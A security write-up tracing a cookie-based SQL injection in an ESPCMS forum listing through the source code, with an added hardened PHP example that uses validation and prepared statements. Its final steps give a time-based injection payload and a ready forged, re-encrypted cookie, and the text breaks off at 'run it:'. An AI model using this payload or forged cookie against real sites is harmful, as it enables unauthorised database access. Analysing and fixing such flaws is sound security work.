$userid in /interface/forummain.php is not filtered before it enters an SQL statement (lines 17 to 32):
function in_list() {
    parent::start_pagetemplate();
    parent::member_purview(0, $this->mlink['orderlist']);
    include_once admin_ROOT . 'public/class_pagebotton.php';
    $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG;
    $page = $this->fun->accept('page', 'G');
    $page = isset($page) ? intval($page) : 1;
    $pagesylte = 1;
    $pagemax = intval($this->CON['bbs_max_list']);
    $userid = $this->ec_member_username_id;   // comes from the decrypted cookie; never cast or escaped
    if (empty($userid)) {
        $this->callmessage($this->lng['db_err'], $_SERVER['HTTP_REFERER'], $this->lng['gobackurlbotton']);
    }
    $db_table = db_prefix . 'bbs';
    $db_where = " WHERE userid=$userid";      // attacker-controlled string interpolated into the WHERE clause
    $countnum = $this->db_numrows($db_table, $db_where);
parent::member_purview, at line 415 of /public/class_connector.php, shows where $this->ec_member_username_id comes from:
function member_purview($userrank = false, $url = null, $upurl = false) {
    $this->ec_member_username = $this->fun->eccode($this->fun->accept('ecisp_member_username', 'C'), 'DECODE', db_pscode);
    // decrypt the ecisp_member_info cookie and split it on '|'
    $user_info = explode('|', $this->fun->eccode($this->fun->accept('ecisp_member_info', 'C'), 'DECODE', db_pscode));
    list($this->ec_member_username_id, $this->ec_member_alias, $this->ec_member_integral,
         $this->ec_member_mcid, $this->ec_member_email, $this->ec_member_lastip,
         $this->ec_member_ipadd, $this->ec_member_useragent, $this->ec_member_adminclassurl) = $user_info;
$this->fun->accept('ecisp_member_username', 'C') reads the ecisp_member_username field from the cookie, and $this->fun->eccode($this->fun->accept('ecisp_member_info', 'C'), 'DECODE', db_pscode) decrypts the ecisp_member_info cookie. The eccode function is at line 164 of \public\class_function.php. Its key is a predefined constant: \datacache\public.php sets db_pscode = Authorization, so anyone who knows that value can decrypt and re-encrypt the cookie. The first field of the decrypted cookie therefore becomes $userid without any processing, is interpolated into $db_where, and is passed to $this->db_numrows. That function is defined at line 293 of \public\class_connector.php (the listing below is the db_numrows_ds variant from the same file, which appends $db_where to the query unchanged):
function db_numrows_ds($db_table, $db_where, $field) {
    // $db_where is concatenated straight into the SQL string
    $resulted = $this->db->query('SELECT COUNT(DISTINCT ' . $field . ') AS num FROM ' . $db_table . $db_where);
    $resulted = $this->db->fetch_assoc($resulted);
    return $resulted['num'];
}
Following $this->db->query to line 55 of \public\class_dbmysql.php:
function query($sql, $type = '', $cachetime = FALSE) {
    $func = $type == 'UNBUFFERED' && @function_exists('mysql_unbuffered_query') ? 'mysql_unbuffered_query' : 'mysql_query';
    if (!($query = $func($sql, $this->link)) && $type != 'SILENT') {
        if (!$this->netclass) {
            $this->halt('MySQL Query Error', $sql);
        }
    }
The string finally reaches mysql_query unchanged, so the cookie value is executed as part of the query: a cookie-based SQL injection.
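The following is an added example, not code from the write-up or from the project: it shows the original interpolation pattern next to a hardened replacement for the in_list() count query. It assumes the decoded ecisp_member_info layout from the member_purview listing above, that eccode()/db_pscode have already produced the plaintext, and uses mysqli prepared statements instead of the project's class_dbmysql/mysql_* layer; the function names parse_member_info, unsafe_where and safe_count_for_member are hypothetical.

```php
<?php
// Added example (not ESPCMS / write-up code). $decoded is the plaintext of the
// ecisp_member_info cookie after the application's eccode(..., 'DECODE', db_pscode).

/**
 * Split the decrypted cookie and validate the field that feeds the query.
 * Returns null when the user id is not a plain positive integer, so a value
 * such as "1 and sleep(9.999999)#" never reaches the database.
 */
function parse_member_info(string $decoded): ?array
{
    $fields = explode('|', $decoded);
    $userid = $fields[0] ?? '';
    // ctype_digit() rejects spaces, operators, comment markers and the empty string.
    if (!ctype_digit($userid) || (int)$userid <= 0) {
        return null;
    }
    return [
        'userid' => (int)$userid,
        'alias'  => $fields[1] ?? '',
        'email'  => $fields[4] ?? '',
    ];
}

/** The original pattern from in_list(): the first cookie field is interpolated verbatim. */
function unsafe_where(string $decoded): string
{
    $userid = explode('|', $decoded)[0];
    return " WHERE userid=$userid";
}

/**
 * Hardened replacement for the db_numrows() call: the id is validated, then
 * bound as an integer parameter. The table name cannot be bound, so it is
 * checked against an identifier pattern before being quoted with backticks.
 */
function safe_count_for_member(mysqli $db, string $table, string $decoded): ?int
{
    $info = parse_member_info($decoded);
    if ($info === null || !preg_match('/^[A-Za-z0-9_]+$/', $table)) {
        return null;
    }
    $stmt = $db->prepare("SELECT COUNT(*) AS num FROM `$table` WHERE userid = ?");
    if ($stmt === false) {
        return null;
    }
    $userid = $info['userid'];
    $stmt->bind_param('i', $userid);
    $stmt->execute();
    $stmt->bind_result($num);
    $stmt->fetch();
    $stmt->close();
    return (int)$num;
}

// Constructed inputs: the decrypted cookie from the write-up, genuine and tampered.
$genuine  = "1|0|1|test@test.com|2130706433|2130706433|"
          . "e0b858f1249c7bbe85c69dcf5eaac720|b8b9ba7f3baab2ada1655924178ceb4";
$tampered = "1 and sleep(9.999999)#|0|1|test@test.com|2130706433|2130706433|"
          . "e0b858f1249c7bbe85c69dcf5eaac720|b8b9ba7f3baab2ada1655924178ceb4";

echo unsafe_where($tampered), PHP_EOL;              // the injected WHERE clause the original code builds
var_dump(parse_member_info($tampered) === null);   // tampered id is rejected before any query
var_dump(parse_member_info($genuine)['userid']);   // genuine id survives as an integer
```

Casting or validating the id closes this particular sink, but it does not remove the root cause: every field in the cookie is "trusted" only because it was encrypted, and the key (db_pscode) is a fixed value shipped with the application. The durable fix is to keep the member identity server-side (a session lookup keyed by an opaque token) or to add an integrity check the client cannot forge, and to validate the remaining fields (lastip, ipadd, mcid and so on) the same way wherever they reach a query.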
After registering and posting a message, decrypt the ecisp_member_info cookie field with the application's own eccode function (the key db_pscode is known). The decrypted value is:
1|0|1|test@test.com|2130706433|2130706433|e0b858f1249c7bbe85c69dcf5eaac720|b8b9ba7f3baab2ada1655924178ceb4
Change the first field to an injected expression:
1 and sleep(9.999999)#|0|1|test@test.com|2130706433|2130706433|e0b858f1249c7bbe85c69dcf5eaac720|b8b9ba7f3baab2ada1655924178ceb4
Re-encrypt it with the same key, which gives:
ZFTCo5lRq6OdmqBanmKabJ-eb59fhq7eaLFksNWaqKV4q52opGDIo86vmJZplm2TaJZraK9mkmhlaGhtbGhjrspkw2ubnZyXaJdrxW-XlZmZaphncZubm2WXxpXEapiVsshuxWvEmWyZZ8OWlpNqmJyWYWiaaZplmZtvn27Gl8Rs
Set this as the cookie value, print the SQL statement that gets executed, and run it: